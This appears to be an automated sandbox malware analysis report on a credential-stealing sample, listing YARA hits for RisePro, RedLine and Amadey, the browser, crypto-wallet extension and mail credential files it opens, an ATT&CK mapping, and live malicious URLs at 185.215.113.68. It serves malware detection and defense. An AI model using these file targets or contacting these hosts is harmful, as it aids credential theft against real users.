Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetCurrentHwProfileA,GetModuleHandleExA,GetModuleFileNameA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetComputerNameA,GetUserNameA,GetDesktopWindow,GetWindowRect,GetUserDefaultLocaleName,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,GetLocalTime,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesA,EnumDisplayDevicesA,CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,Process32Next,CloseHandle,RegOpenKeyExA,RegEnumKeyExA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,RegCloseKey,	2_2_0040FCB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_0051C044
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	2_2_0051C14A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_0051C220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	2_2_005127E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoEx,FormatMessageA,	2_2_004F984F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	2_2_0051B8AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	2_2_0051BAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	2_2_0051BB57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	2_2_0051BBA2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	2_2_0051BC3D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_0051BCC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	2_2_00512D64
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	2_2_0051BF1B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Queries volume information: C:\ProgramData\MPGPH131\MPGPH131.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Queries volume information: C:\ProgramData\MPGPH131\MPGPH131.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Queries volume information: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Queries volume information: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Queries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Queries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Queries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Queries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000397001\autorun.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000397001\autorun.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000400001\setuppowergrepdemo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000400001\setuppowergrepdemo.exe VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

2_2_0040FCB0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0041F380 GetModuleFileNameA,GetUserNameA,__Mtx_unlock,

2_2_0041F380

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00514AB3 GetTimeZoneInformation,

2_2_00514AB3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_004ADA60 GetVersionExA,CreateFileW,CreateFileA,GetDiskFreeSpaceW,GetDiskFreeSpaceA,

2_2_004ADA60

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Amadeys Clipper DLL

Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\clip64[1].dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, type: DROPPED

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 46.2.explorhe.exe.950000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.PXBvYMcLF9IUsaGl9axr.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2431950677.0000000000DB1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.4707775638.0000000000951000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\clip64[1].dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected RisePro Stealer

Source: Yara match	File source: 2.2.RegAsm.exe.15e7e63.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.15e622d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.15e7e63.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe.43f5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.15e622d.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2596470514.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2084693372.00000000043F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2594202655.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5868, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\xVorLOq_sWZyw11ZiThUZWTpoEoWfgdl.zip, type: DROPPED

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\LocalPrefs.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\signons.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\signons.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\places.sqlite	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Source: 3kaNpKWTvXjwLZn_llOJ.exe	Binary or memory string: WIN_81
Source: 3kaNpKWTvXjwLZn_llOJ.exe	Binary or memory string: WIN_XP
Source: 3kaNpKWTvXjwLZn_llOJ.exe.2.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: 3kaNpKWTvXjwLZn_llOJ.exe	Binary or memory string: WIN_XPe
Source: 3kaNpKWTvXjwLZn_llOJ.exe	Binary or memory string: WIN_VISTA
Source: 3kaNpKWTvXjwLZn_llOJ.exe	Binary or memory string: WIN_7
Source: 3kaNpKWTvXjwLZn_llOJ.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected RisePro Stealer

Source: Yara match	File source: 2.2.RegAsm.exe.15e7e63.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.15e622d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.15e7e63.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe.43f5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.15e622d.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2596470514.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2084693372.00000000043F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2594202655.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5868, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\xVorLOq_sWZyw11ZiThUZWTpoEoWfgdl.zip, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_00691204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		16_2_00691204
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_00691806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		16_2_00691806

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
2 Valid Accounts	12 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	12 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	14 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	1 System Shutdown/Reboot	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	2 Command and Scripting Interpreter	2 Valid Accounts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	Exfiltration Over Bluetooth	11 Encrypted Channel	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Extra Window Memory Injection	3 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	Automated Exfiltration	1 Non-Standard Port			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	Cron	11 Registry Run Keys / Startup Folder	2 Valid Accounts	23 Software Packing	NTDS	48 System Information Discovery	Distributed Component Object Model	1 Email Collection	Traffic Duplication	4 Non-Application Layer Protocol			Data Destruction	Virtual Private Server	Employee Names
Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	351 Security Software Discovery	SSH	21 Input Capture	Scheduled Transfer	115 Application Layer Protocol			Data Encrypted for Impact	Server	Gather Victim Network Information
Replication Through Removable Media	Scheduled Task	RC Scripts	512 Process Injection	1 Extra Window Memory Injection	Cached Domain Credentials	231 Virtualization/Sandbox Evasion	VNC	3 Clipboard Data	Data Transfer Size Limits	Multiband Communication			Service Stop	Botnet	Domain Properties
External Remote Services	Systemd Timers	Startup Items	1 Scheduled Task/Job	1 Masquerading	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over C2 Channel	Commonly Used Port			Inhibit System Recovery	Web Services	DNS
Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	11 Registry Run Keys / Startup Folder	2 Valid Accounts	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Exfiltration Over Alternative Protocol	Application Layer Protocol			Defacement	Serverless	Network Trust Dependencies
Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	231 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Web Protocols			Internal Defacement	Malvertising	Network Topology
Supply Chain Compromise	PowerShell	Cron	Cron	21 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	File Transfer Protocols			External Defacement	Compromise Infrastructure	IP Addresses
Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	512 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Exfiltration Over Unencrypted Non-C2 Protocol	Mail Protocols			Firmware Corruption	Domains	Network Security Appliances

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	24%	ReversingLabs	Win32.Trojan.Generic
SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\MPGPH131\MPGPH131.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\autorun[1].exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\clip64[1].dll	96%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1000397001\autorun.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll	96%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll.tmp	0%	ReversingLabs

Source	Detection	Scanner	Label
http://www.mozilla.com0	0%	URL Reputation	safe
https://www.internalfb.com/intern/invariant/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://exslt.org/common	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
http://185.215.113.68/mine/amer.exeshCore	100%	Avira URL Cloud	malware
http://polymer.github.io/PATENTS.txt	0%	Avira URL Cloud	safe
http://185.215.113.68/theme/index.php#;	100%	Avira URL Cloud	malware
http://185.215.113.68/theme/index.phpA;?d	100%	Avira URL Cloud	malware
http://polymer.github.io/AUTHORS.txt	0%	Avira URL Cloud	safe
http://detectportal.firefox.comh	0%	Avira URL Cloud	safe
http://185.215.113.68/theme/index.php%;	100%	Avira URL Cloud	malware
http://go.microsoft.cP	0%	Avira URL Cloud	safe
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
https://csp.withgoogle.com/csp/report-to/youtube-main-app-web-scs-key	0%	Avira URL Cloud	safe
https://ads.stickyadstv.com/firefox-etp	0%	Avira URL Cloud	safe
https://tracking-protection-issues.herokuapp.com/new	0%	Avira URL Cloud	safe
https://bzib.nelreports.net/api/report?cat=bingbusiness	0%	Avira URL Cloud	safe
http://exslt.org/dates-and-times	0%	Avira URL Cloud	safe
https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152	0%	Avira URL Cloud	safe
https://bugzilla.mo	0%	Avira URL Cloud	safe
http://185.215.113.68/theme/index.phpy	100%	Avira URL Cloud	phishing
https://tmpfiles.org/dl/3900221/setuppowergrepdemo.exe	0%	Avira URL Cloud	safe
https://www.youtube.comMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:	0%	Avira URL Cloud	safe
http://185.215.113.68/theme/index.phpt	100%	Avira URL Cloud	malware
http://185.215.113.68/theme/index.phpIU)(A;OICI;FA;;;SY)j-oe	100%	Avira URL Cloud	malware
http://185.215.113.68/theme/index.phpr	100%	Avira URL Cloud	malware
https://sb.scorecardresearch.com/b2?rn=1705534516527&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=	0%	Avira URL Cloud	safe
http://185.215.113.68/theme/index.phpj	100%	Avira URL Cloud	malware
http://www.founder.com.cn/cn/bThe	0%	Avira URL Cloud	safe
http://185.215.113.68/theme/index.phpi	100%	Avira URL Cloud	malware
http://185.215.113.68/theme/index.phph	100%	Avira URL Cloud	malware
http://185.215.113.68/theme/index.phpc	100%	Avira URL Cloud	malware
https://www.youtube.comC:	0%	Avira URL Cloud	safe
http://185.215.113.68/theme/index.phpZ	100%	Avira URL Cloud	malware
https://csp.withgoogle.com/csp/report-to/youtube	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
example.org	93.184.216.34	true	false	high
chrome.cloudflare-dns.com	104.18.22.202	true	false	unknown
prod.detectportal.prod.cloudops.mozgcp.net	34.107.221.82	true	false	unknown
services.addons.mozilla.org	13.225.63.72	true	false	high
i.ytimg.com	142.250.65.214	true	false	high
rr2.sn-q4fl6nz6.googlevideo.com	173.194.57.39	true	false	high
ssl.bingadsedgeextension-prod-eastus.azurewebsites.net	40.71.99.188	true	false	unknown
mitmdetection.services.mozilla.com	13.226.34.9	true	false	high
rr1.sn-q4fl6nlz.googlevideo.com	74.125.1.166	true	false	high
contile.services.mozilla.com	34.117.237.239	true	false	high
